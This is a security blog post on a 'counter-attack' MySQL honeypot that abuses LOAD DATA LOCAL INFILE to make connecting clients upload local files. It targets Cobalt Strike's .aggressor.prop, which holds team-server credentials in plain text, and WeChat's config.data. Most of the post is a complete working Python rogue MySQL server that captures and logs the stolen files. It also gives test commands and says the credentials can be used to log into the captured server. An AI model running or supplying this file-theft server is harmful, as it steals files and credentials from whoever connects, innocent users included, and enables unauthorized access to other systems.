
Title: Mysql honeypot reads computer configuration files


There are already plenty of articles on the Internet about the technical details of the MySQL honeypot, so I will only give a brief introduction here (you can search for the rest yourself). MySQL has a LOAD DATA LOCAL INFILE feature that lets a file on the client machine be read into a table on the server. On the wire it works the other way round from what you might expect: the client sends a query, and the server's reply to that query can be a "LOCAL INFILE request" packet (a 0xFB byte followed by a file name); a client with local-infile support enabled then reads that file from its own disk and sends the contents to the server. So when an attacker finds our MySQL port with a scanner that brute-forces MySQL passwords and then connects to it (a correction here: they only need to connect; the honeypot does not care about the username and password, so there is no need to know the correct credentials), the attacker's client will automatically issue a query, and we, the fake server, answer it with a LOAD DATA LOCAL INFILE request naming the file we want. The client obligingly uploads it to our honeypot, which is the counter-measure. This only works if the attacker's client honours such requests: libmysqlclient does so when the connection was opened with local-infile enabled, which many GUI clients and older connectors still do, while the mysql command-line client in recent versions disables it by default. (The following pictures are from an Internet search.)

[figure]

The Cobalt Strike (CS) configuration file stores the password in plaintext

As long as the CS client on a computer has been used to connect to a CS team server, it writes a .aggressor.prop configuration file to a fixed location in the user's profile directory. On Windows that is, for example, C:\Users\Administrator\.aggressor.prop. This configuration file contains the IP address, port, username and password of the CS team server, all in plain text! As shown in the figure below:

[figure]

Every time you open CS, it shows the IP address, port, username, password and other details of the servers you have logged in to before. This information is kept in the local .aggressor.prop file, whose general content looks like the figure below:

[figure]

So the conclusion is: build a MySQL honeypot. Once the attacker connects to it, the honeypot abuses the MySQL LOAD DATA LOCAL INFILE behaviour to make the attacker's client read C:\Users\Administrator\.aggressor.prop and send it to us, so the honeypot obtains the IP address, port, username and password of the attacker's CS team server.

Building a test environment

To verify the idea, it still has to be tested in practice. Take a MySQL honeypot script written in Python from GitHub, make a small local change so that the file it requests is C:\Users\Administrator\.aggressor.prop, and run it. As shown in the figure below, a MySQL honeypot listening on local port 3306 is now running.

[figure]

To simulate a red-teamer connecting to MySQL, use Navicat to connect remotely to the honeypot's IP address. (To stress it again: there is no need to know a MySQL username and password. Enter a wrong username and password and the MySQL honeypot still reads the local file.)
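The exchange the honeypot performs (greeting, "accepting" whatever credentials arrive, answering the client's first query with a LOCAL INFILE request, collecting the uploaded file and logging it base64-encoded), as an added example written for this page. It is not the GitHub script the post refers to. The target path is the one from the post; the server version string, the log file name and line format, and the constructed sample .aggressor.prop content used by the offline simulation are assumptions of this example.

```python
import base64
import io
import socket
import struct
import threading
from datetime import datetime, timezone

# MySQL client/server protocol constants (capability bits and command bytes).
CLIENT_LOCAL_FILES = 0x00000080      # server tells the client "LOAD DATA LOCAL is allowed"
CAPABILITIES = (0x00000001 | 0x00000004 | 0x00000008 | CLIENT_LOCAL_FILES
                | 0x00000200 | 0x00008000 | 0x00080000)   # LONG_PASSWORD, LONG_FLAG,
                                                          # CONNECT_WITH_DB, PROTOCOL_41,
                                                          # SECURE_CONNECTION, PLUGIN_AUTH
COM_QUIT, COM_QUERY = 0x01, 0x03
OK_PACKET = b"\x00\x00\x00\x02\x00\x00\x00"  # OK: 0 rows, 0 insert id, AUTOCOMMIT, 0 warnings

TARGET_PATH = r"C:\Users\Administrator\.aggressor.prop"  # from the post
LOG_FILE = "honeypot.log"                                # assumed name for this example


def frame(seq, payload):
    """Add the 3-byte little-endian length + 1-byte sequence-id packet header."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def read_packet(rfile):
    """Return (seq, payload) for the next packet, or (None, None) at EOF."""
    hdr = rfile.read(4)
    if len(hdr) < 4:
        return None, None
    return hdr[3], rfile.read(hdr[0] | (hdr[1] << 8) | (hdr[2] << 16))


def build_greeting(connection_id=1, version=b"5.7.35-honeypot"):
    """Protocol::HandshakeV10 advertising CLIENT_LOCAL_FILES. Version string is made up;
    the salt is fixed because the password is never checked anyway."""
    salt1, salt2 = b"A" * 8, b"B" * 12
    p = (b"\x0a" + version + b"\x00" + struct.pack("<I", connection_id) + salt1 + b"\x00"
         + struct.pack("<H", CAPABILITIES & 0xFFFF) + b"\x21"      # utf8_general_ci
         + struct.pack("<H", 0x0002)                               # SERVER_STATUS_AUTOCOMMIT
         + struct.pack("<H", CAPABILITIES >> 16)
         + bytes([len(salt1) + len(salt2) + 1]) + b"\x00" * 10    # auth-data length, reserved
         + salt2 + b"\x00" + b"mysql_native_password\x00")
    return frame(0, p)


def build_local_infile_request(seq, path):
    """0xFB + filename: the server's way of asking the client to upload a local file."""
    return frame(seq, b"\xfb" + path.encode())


def handle_session(rfile, wfile, target_path=TARGET_PATH):
    """Drive one client: greet, accept any credentials, answer the first query with a
    LOCAL INFILE request for target_path, return the bytes the client sends back."""
    wfile.write(build_greeting()); wfile.flush()
    read_packet(rfile)                               # HandshakeResponse41, never verified
    wfile.write(frame(2, OK_PACKET)); wfile.flush()  # "login succeeded"
    while True:
        seq, payload = read_packet(rfile)
        if not payload or payload[0] == COM_QUIT:
            return b""
        if payload[0] != COM_QUERY:                  # COM_PING, COM_INIT_DB, ...: just say OK
            wfile.write(frame(seq + 1, OK_PACKET)); wfile.flush()
            continue
        wfile.write(build_local_infile_request(seq + 1, target_path)); wfile.flush()
        chunks = []
        while True:                                  # file arrives in packets, ended by an empty one
            seq, data = read_packet(rfile)
            if not data:                             # empty packet: EOF, or the client had no such file
                break
            chunks.append(data)
        if seq is not None:
            wfile.write(frame(seq + 1, OK_PACKET)); wfile.flush()
        return b"".join(chunks)


def serve(host="0.0.0.0", port=3306):
    """Listen like a real MySQL server; one base64 log line per connection."""
    def client(conn, addr):
        loot = b""
        try:
            with conn, conn.makefile("rb") as r, conn.makefile("wb") as w:
                loot = handle_session(r, w)
        except OSError:
            pass
        with open(LOG_FILE, "a") as log:
            log.write(f"{datetime.now(timezone.utc).isoformat()} {addr[0]}:{addr[1]} "
                      f"{TARGET_PATH} {base64.b64encode(loot).decode()}\n")
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port)); srv.listen(5)
    while True:
        conn, addr = srv.accept()
        threading.Thread(target=client, args=(conn, addr), daemon=True).start()


# Constructed sample (not a real .aggressor.prop) and a stand-in for what a client that honours
# the LOCAL INFILE request puts on the wire, so the session logic can be exercised offline.
SAMPLE_PROP = b"# constructed sample\nhost=203.0.113.10\nport=50050\nuser=operator\npass=hunter2\n"


def simulate_attacker(file_content=SAMPLE_PROP):
    wire = frame(1, b"\x00" * 32 + b"root\x00")               # HandshakeResponse41, any creds
    wire += frame(0, bytes([COM_QUERY]) + b"SHOW VARIABLES")  # the client's first query
    wire += frame(2, file_content) + frame(3, b"")            # uploaded file, then empty EOF packet
    wire += frame(0, bytes([COM_QUIT]))
    rfile, wfile = io.BytesIO(wire), io.BytesIO()
    return handle_session(rfile, wfile), wfile.getvalue()     # (captured file, server bytes)


if __name__ == "__main__":
    assert simulate_attacker()[0] == SAMPLE_PROP   # offline self-check before listening
    serve()
```

To try it against a real client, run the script and connect with any credentials, e.g. `mysql --local-infile=1 -h <honeypot> -u x -p`; the `--local-infile=1` is needed because recent command-line clients refuse the 0xFB request by default, whereas GUI clients such as the Navicat used in the post typically still honour it. The greeting deliberately does not advertise CLIENT_SSL, so a client configured to require TLS will fail rather than upload anything.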

[figure]

As shown in the figure below, the MySQL honeypot writes the base64-encoded content of the CS configuration file to the log file in its current directory.

[figure]

After base64 decoding, the result is as follows:

[figure]

With the IP address, port, username and password obtained this way, one can log in to the CS team server (the following pictures are from the Internet).

[figure]

Under Windows, WeChat keeps its configuration under C:\Users\username\Documents\WeChat Files\ by default. If you look through it, you will find that C:\Users\username\Documents\WeChat Files\All Users\config\config.data contains the WeChat ID (in the test environment the path was C:\Users\backlion\Documents\WeChat Files\All Users\config\config.data), so the same honeypot trick can be pointed at that file as well.

[figure]
